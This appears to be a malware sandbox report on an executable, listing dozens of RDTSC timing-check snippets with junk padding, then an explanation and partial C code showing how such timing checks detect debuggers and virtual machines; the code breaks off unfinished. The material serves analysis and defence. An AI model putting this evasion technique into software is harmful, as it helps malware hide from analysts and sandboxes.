              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDB9B second address: 7FDBBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F4F3CC87F85h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDBBF second address: 7FDBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDBC3 second address: 7FDBC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDE2E second address: 7FDE3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4F3C50B5DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDF49 second address: 7FDF51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE399 second address: 7FE3AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4F3C50B5D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F4F3C50B5D6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF33C second address: 7FF352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F81h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF352 second address: 7FF3AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E5h 0x00000007 push ebx 0x00000008 jmp 00007F4F3C50B5DDh 0x0000000d jnl 00007F4F3C50B5D6h 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jc 00007F4F3C50B612h 0x0000001c jmp 00007F4F3C50B5E1h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F4F3C50B5E5h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1C6 second address: 7FD1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1CA second address: 7FD1CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1CE second address: 7FD1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F4F3CC87F82h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1DC second address: 7FD1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD1E2 second address: 7FD1E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 816260 second address: 816264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8187EC second address: 8187F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8187F0 second address: 818800 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4F3C50B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 818800 second address: 818804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 818804 second address: 81883C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4F3C50B5E4h 0x0000000c jbe 00007F4F3C50B5D8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edi 0x00000015 jmp 00007F4F3C50B5E2h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 818547 second address: 81856B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F4F3CC87F86h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F4F3CC87F76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 819EEE second address: 819F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F4F3C50B5E1h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 819F07 second address: 819F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 819F11 second address: 819F1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F4F3C50B5D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 819F1D second address: 819F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 819F28 second address: 819F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 819F2C second address: 819F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 833468 second address: 833485 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4F3C50B5EFh 0x00000008 jmp 00007F4F3C50B5E3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 833485 second address: 833492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jng 00007F4F3CC87F76h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 83375B second address: 833761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 833761 second address: 833769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8338E1 second address: 8338E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 833A17 second address: 833A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 833A26 second address: 833A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 833B81 second address: 833B85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 833B85 second address: 833B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4F3C50B5DFh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 833B9E second address: 833BA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8345FA second address: 8345FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8345FE second address: 83460A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4F3CC87F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 837F8C second address: 837F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 837F96 second address: 837FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007F4F3CC87F7Ch 0x0000000b jng 00007F4F3CC87F76h 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 837FAD second address: 837FB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84779A second address: 84779E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 84779E second address: 8477AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 856582 second address: 856593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnc 00007F4F3CC87F78h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 856593 second address: 8565D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F4F3C50B5E7h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F4F3C50B5E1h 0x00000015 jbe 00007F4F3C50B5E6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 859DCA second address: 859DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 859DD0 second address: 859DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 859DD4 second address: 859DE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F4F3CC87F76h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 859DE8 second address: 859E05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86ED6E second address: 86ED74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86DE46 second address: 86DE51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86DE51 second address: 86DE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86DE55 second address: 86DE61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E586 second address: 86E58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E58A second address: 86E5AE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4F3C50B5D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d jl 00007F4F3C50B5F3h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4F3C50B5DFh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E5AE second address: 86E5B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E885 second address: 86E8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5DFh 0x00000009 jp 00007F4F3C50B5D6h 0x0000000f jc 00007F4F3C50B5D6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007F4F3C50B5E3h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E8BC second address: 86E8C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E8C0 second address: 86E8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007F4F3C50B5D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E8D5 second address: 86E8EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F4F3CC87F81h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86E8EC second address: 86E911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F4F3C50B5D6h 0x00000009 jmp 00007F4F3C50B5E8h 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 86EA65 second address: 86EA6F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4F3CC87F76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 870493 second address: 8704B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5DFh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jp 00007F4F3C50B5D6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 872F23 second address: 872F29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 873249 second address: 873252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 874784 second address: 87479B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87479B second address: 8747BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5E8h 0x00000009 popad 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8747BD second address: 8747C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4F3CC87F76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 87654C second address: 876550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 876550 second address: 876556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE0396 second address: 4EE03D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov esi, 2E56F65Bh 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov bx, cx 0x00000011 pushfd 0x00000012 jmp 00007F4F3C50B5E8h 0x00000017 and cl, 00000058h 0x0000001a jmp 00007F4F3C50B5DBh 0x0000001f popfd 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE03D7 second address: 4EE03DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE03DB second address: 4EE03ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE03ED second address: 4EE0427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5312D364h 0x00000008 pushfd 0x00000009 jmp 00007F4F3CC87F7Dh 0x0000000e jmp 00007F4F3CC87F7Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4F3CC87F80h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE0427 second address: 4EE042D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE042D second address: 4EE0434 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE0434 second address: 4EE0443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, 8Fh 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE048D second address: 4EE049D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F3CC87F7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE049D second address: 4EE04A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE04A1 second address: 4EE04DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a call 00007F4F3CC87F7Ah 0x0000000f pushfd 0x00000010 jmp 00007F4F3CC87F82h 0x00000015 sbb ax, 36C8h 0x0000001a jmp 00007F4F3CC87F7Bh 0x0000001f popfd 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE04DE second address: 4EE04E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE04E2 second address: 4EE04F3 instructions: 0x00000000 rdtsc 0x00000002 mov ax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE04F3 second address: 4EE04F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE04F7 second address: 4EE050F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE050F second address: 4EE0554 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4F3C50B5E1h 0x00000009 sbb esi, 108D8146h 0x0000000f jmp 00007F4F3C50B5E1h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4F3C50B5DFh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE0554 second address: 4EE055A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE055A second address: 4EE0560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EE0560 second address: 4EE0564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7892CE second address: 7892DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4F3C50B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7892DB second address: 7892E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7892E1 second address: 7892F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jc 00007F4F3C50B5E4h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
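Every interceptor line above records the same shape: an rdtsc, a short run of instructions that does no useful work (push/pop pairs, pushad/popad, jmp to the next instruction, conditional jumps over nothing), then a second rdtsc. The packed code compares the two time-stamp counter readings and treats a large gap as evidence of single-stepping, emulation or a hypervisor that traps RDTSC. The following is an added example written for this page, not code from the report or from the sample, that reproduces that check in C so the behaviour can be measured on a real and on an instrumented host. The threshold, the sample count and the "median of several runs" decision rule are assumptions chosen for illustration; the report does not say what the sample compares against.

```c
/* Added example (not from the Joe Sandbox report or the analysed sample):
 * an RDTSC timing check of the kind the interceptor lines record.
 * Pattern: rdtsc; short filler; rdtsc; compare the delta with a threshold. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#if defined(_MSC_VER)
#include <intrin.h>               /* __rdtsc on MSVC */
static uint64_t read_tsc(void) { return __rdtsc(); }
#elif defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>            /* __rdtsc on gcc/clang */
static uint64_t read_tsc(void) { return __rdtsc(); }
#else
#include <time.h>
/* Non-x86 fallback so the example still builds: nanoseconds stand in for cycles. */
static uint64_t read_tsc(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

/* One measurement: rdtsc, filler, rdtsc. The filler is volatile so the compiler
 * cannot delete it; it plays the role of the push eax / pop eax padding in the
 * report. RDTSC is not serialising, so the two reads can be reordered around
 * the filler; the sample's own padding has the same weakness. */
static uint64_t rdtsc_delta(void) {
    volatile uint32_t pad = 0;
    uint64_t t0 = read_tsc();
    pad += 1;
    pad -= 1;
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of n deltas. A single reading is noisy (interrupts, context switches,
 * a cold cache on the first call), so the check is repeated and the median
 * used; the sample above likewise scatters dozens of rdtsc pairs. Sorts in place. */
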